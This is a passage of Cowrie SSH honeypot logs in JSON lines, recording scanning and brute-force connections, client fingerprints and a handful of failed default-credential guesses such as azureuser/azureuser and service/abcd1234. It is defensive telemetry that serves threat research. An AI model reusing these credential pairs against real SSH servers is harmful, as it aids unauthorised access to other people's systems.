8-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:27:28.076306Z","src_ip":"212.227.235.229","session":"b605d767a6d5"}
{"eventid":"cowrie.login.failed","username":"azureuser","password":"azureuser","message":"login attempt [azureuser/azureuser] failed","sensor":"my-vps","timestamp":"2025-08-28T02:27:28.402757Z","src_ip":"212.227.235.229","session":"b605d767a6d5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:27:29.512616Z","src_ip":"212.227.235.229","session":"b605d767a6d5"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":39694,"dst_ip":"1.2.3.4","dst_port":22,"session":"162ada43a3d9","protocol":"ssh","message":"New connection: 194.233.79.134:39694 (1.2.3.4:22) [session: 162ada43a3d9]","sensor":"my-vps","timestamp":"2025-08-28T02:27:38.119572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:27:38.120636Z","src_ip":"194.233.79.134","session":"162ada43a3d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:27:38.427509Z","src_ip":"194.233.79.134","session":"162ada43a3d9"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:27:39.929753Z","src_ip":"194.233.79.134","session":"162ada43a3d9"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:27:41.270374Z","src_ip":"194.233.79.134","session":"162ada43a3d9"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":38437,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd04be974f2c","protocol":"ssh","message":"New connection: 80.94.95.15:38437 (1.2.3.4:22) [session: bd04be974f2c]","sensor":"my-vps","timestamp":"2025-08-28T02:27:56.336953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:27:56.338085Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:27:56.389223Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.login.failed","username":"service","password":"service","message":"login attempt [service/service] failed","sensor":"my-vps","timestamp":"2025-08-28T02:27:56.694223Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.login.failed","username":"service","password":"abc123","message":"login attempt [service/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:27:57.750531Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.login.failed","username":"service","password":"abcd123","message":"login attempt [service/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:27:58.811415Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.login.failed","username":"service","password":"abcd1234","message":"login attempt [service/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:27:59.864476Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.login.failed","username":"service","password":"abc1234","message":"login attempt [service/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:28:00.927895Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:28:01.982149Z","src_ip":"80.94.95.15","session":"bd04be974f2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38330,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f1e8df1dec5","protocol":"ssh","message":"New connection: 212.227.235.229:38330 (1.2.3.4:22) [session: 4f1e8df1dec5]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.481556Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38342,"dst_ip":"1.2.3.4","dst_port":22,"session":"85772073b938","protocol":"ssh","message":"New connection: 212.227.235.229:38342 (1.2.3.4:22) [session: 85772073b938]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.482985Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38352,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffe8454448ba","protocol":"ssh","message":"New connection: 212.227.235.229:38352 (1.2.3.4:22) [session: ffe8454448ba]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.484051Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38432,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf935e0df368","protocol":"ssh","message":"New connection: 212.227.235.229:38432 (1.2.3.4:22) [session: bf935e0df368]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.485641Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38304,"dst_ip":"1.2.3.4","dst_port":22,"session":"239563187195","protocol":"ssh","message":"New connection: 212.227.235.229:38304 (1.2.3.4:22) [session: 239563187195]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.486431Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38348,"dst_ip":"1.2.3.4","dst_port":22,"session":"d333381e0684","protocol":"ssh","message":"New connection: 212.227.235.229:38348 (1.2.3.4:22) [session: d333381e0684]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.487097Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38316,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaffd4b57dd1","protocol":"ssh","message":"New connection: 212.227.235.229:38316 (1.2.3.4:22) [session: eaffd4b57dd1]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.487902Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38356,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc85ee81838f","protocol":"ssh","message":"New connection: 212.227.235.229:38356 (1.2.3.4:22) [session: bc85ee81838f]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.488643Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38312,"dst_ip":"1.2.3.4","dst_port":22,"session":"728c851f434d","protocol":"ssh","message":"New connection: 212.227.235.229:38312 (1.2.3.4:22) [session: 728c851f434d]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.489544Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38308,"dst_ip":"1.2.3.4","dst_port":22,"session":"a43bbea5f3d3","protocol":"ssh","message":"New connection: 212.227.235.229:38308 (1.2.3.4:22) [session: a43bbea5f3d3]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.490075Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38416,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7340f27d6a2","protocol":"ssh","message":"New connection: 212.227.235.229:38416 (1.2.3.4:22) [session: c7340f27d6a2]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.490693Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38368,"dst_ip":"1.2.3.4","dst_port":22,"session":"69a802132405","protocol":"ssh","message":"New connection: 212.227.235.229:38368 (1.2.3.4:22) [session: 69a802132405]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.491707Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38392,"dst_ip":"1.2.3.4","dst_port":22,"session":"4945336a5d3c","protocol":"ssh","message":"New connection: 212.227.235.229:38392 (1.2.3.4:22) [session: 4945336a5d3c]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.492512Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38406,"dst_ip":"1.2.3.4","dst_port":22,"session":"d559485efa87","protocol":"ssh","message":"New connection: 212.227.235.229:38406 (1.2.3.4:22) [session: d559485efa87]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.493063Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38384,"dst_ip":"1.2.3.4","dst_port":22,"session":"36ec78f4e7d5","protocol":"ssh","message":"New connection: 212.227.235.229:38384 (1.2.3.4:22) [session: 36ec78f4e7d5]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.493681Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38528,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f8588239099","protocol":"ssh","message":"New connection: 212.227.235.229:38528 (1.2.3.4:22) [session: 3f8588239099]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.494527Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38460,"dst_ip":"1.2.3.4","dst_port":22,"session":"c11ef47c5ae8","protocol":"ssh","message":"New connection: 212.227.235.229:38460 (1.2.3.4:22) [session: c11ef47c5ae8]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.495338Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38484,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1060d9f1a2b","protocol":"ssh","message":"New connection: 212.227.235.229:38484 (1.2.3.4:22) [session: f1060d9f1a2b]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.495997Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38446,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a8fc61d47c8","protocol":"ssh","message":"New connection: 212.227.235.229:38446 (1.2.3.4:22) [session: 3a8fc61d47c8]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.496588Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38492,"dst_ip":"1.2.3.4","dst_port":22,"session":"5efbd3134968","protocol":"ssh","message":"New connection: 212.227.235.229:38492 (1.2.3.4:22) [session: 5efbd3134968]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.497315Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38468,"dst_ip":"1.2.3.4","dst_port":22,"session":"05ecbf9d8460","protocol":"ssh","message":"New connection: 212.227.235.229:38468 (1.2.3.4:22) [session: 05ecbf9d8460]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.498028Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38508,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe73ab0176f2","protocol":"ssh","message":"New connection: 212.227.235.229:38508 (1.2.3.4:22) [session: fe73ab0176f2]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.498601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.500132Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38536,"dst_ip":"1.2.3.4","dst_port":22,"session":"669f50c2cfcc","protocol":"ssh","message":"New connection: 212.227.235.229:38536 (1.2.3.4:22) [session: 669f50c2cfcc]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.500999Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38510,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b755705e882","protocol":"ssh","message":"New connection: 212.227.235.229:38510 (1.2.3.4:22) [session: 3b755705e882]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.501784Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38550,"dst_ip":"1.2.3.4","dst_port":22,"session":"98f3b52019dc","protocol":"ssh","message":"New connection: 212.227.235.229:38550 (1.2.3.4:22) [session: 98f3b52019dc]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.502425Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38516,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5cbf9baa4f","protocol":"ssh","message":"New connection: 212.227.235.229:38516 (1.2.3.4:22) [session: 1d5cbf9baa4f]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.503216Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38534,"dst_ip":"1.2.3.4","dst_port":22,"session":"fde3ad4ca49b","protocol":"ssh","message":"New connection: 212.227.235.229:38534 (1.2.3.4:22) [session: fde3ad4ca49b]","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.503944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.504642Z","src_ip":"212.227.235.229","session":"85772073b938"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.505295Z","src_ip":"212.227.235.229","session":"ffe8454448ba"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.505985Z","src_ip":"212.227.235.229","session":"bf935e0df368"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.506558Z","src_ip":"212.227.235.229","session":"239563187195"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.507475Z","src_ip":"212.227.235.229","session":"d333381e0684"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.508548Z","src_ip":"212.227.235.229","session":"eaffd4b57dd1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.509301Z","src_ip":"212.227.235.229","session":"bc85ee81838f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.510523Z","src_ip":"212.227.235.229","session":"728c851f434d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.511147Z","src_ip":"212.227.235.229","session":"a43bbea5f3d3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.511919Z","src_ip":"212.227.235.229","session":"c7340f27d6a2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.512504Z","src_ip":"212.227.235.229","session":"69a802132405"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.513855Z","src_ip":"212.227.235.229","session":"4945336a5d3c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.514450Z","src_ip":"212.227.235.229","session":"d559485efa87"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.515287Z","src_ip":"212.227.235.229","session":"36ec78f4e7d5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.516327Z","src_ip":"212.227.235.229","session":"3f8588239099"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.516935Z","src_ip":"212.227.235.229","session":"c11ef47c5ae8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.517715Z","src_ip":"212.227.235.229","session":"f1060d9f1a2b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.518253Z","src_ip":"212.227.235.229","session":"3a8fc61d47c8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.518959Z","src_ip":"212.227.235.229","session":"5efbd3134968"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.519527Z","src_ip":"212.227.235.229","session":"05ecbf9d8460"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.520146Z","src_ip":"212.227.235.229","session":"fe73ab0176f2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.520751Z","src_ip":"212.227.235.229","session":"669f50c2cfcc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.521363Z","src_ip":"212.227.235.229","session":"3b755705e882"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.521940Z","src_ip":"212.227.235.229","session":"98f3b52019dc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.522559Z","src_ip":"212.227.235.229","session":"1d5cbf9baa4f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.523191Z","src_ip":"212.227.235.229","session":"fde3ad4ca49b"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.589565Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.594124Z","src_ip":"212.227.235.229","session":"85772073b938"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T02:28:54.595876Z","src_ip":"212.227.235.229","session":"bf935e0df368"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ec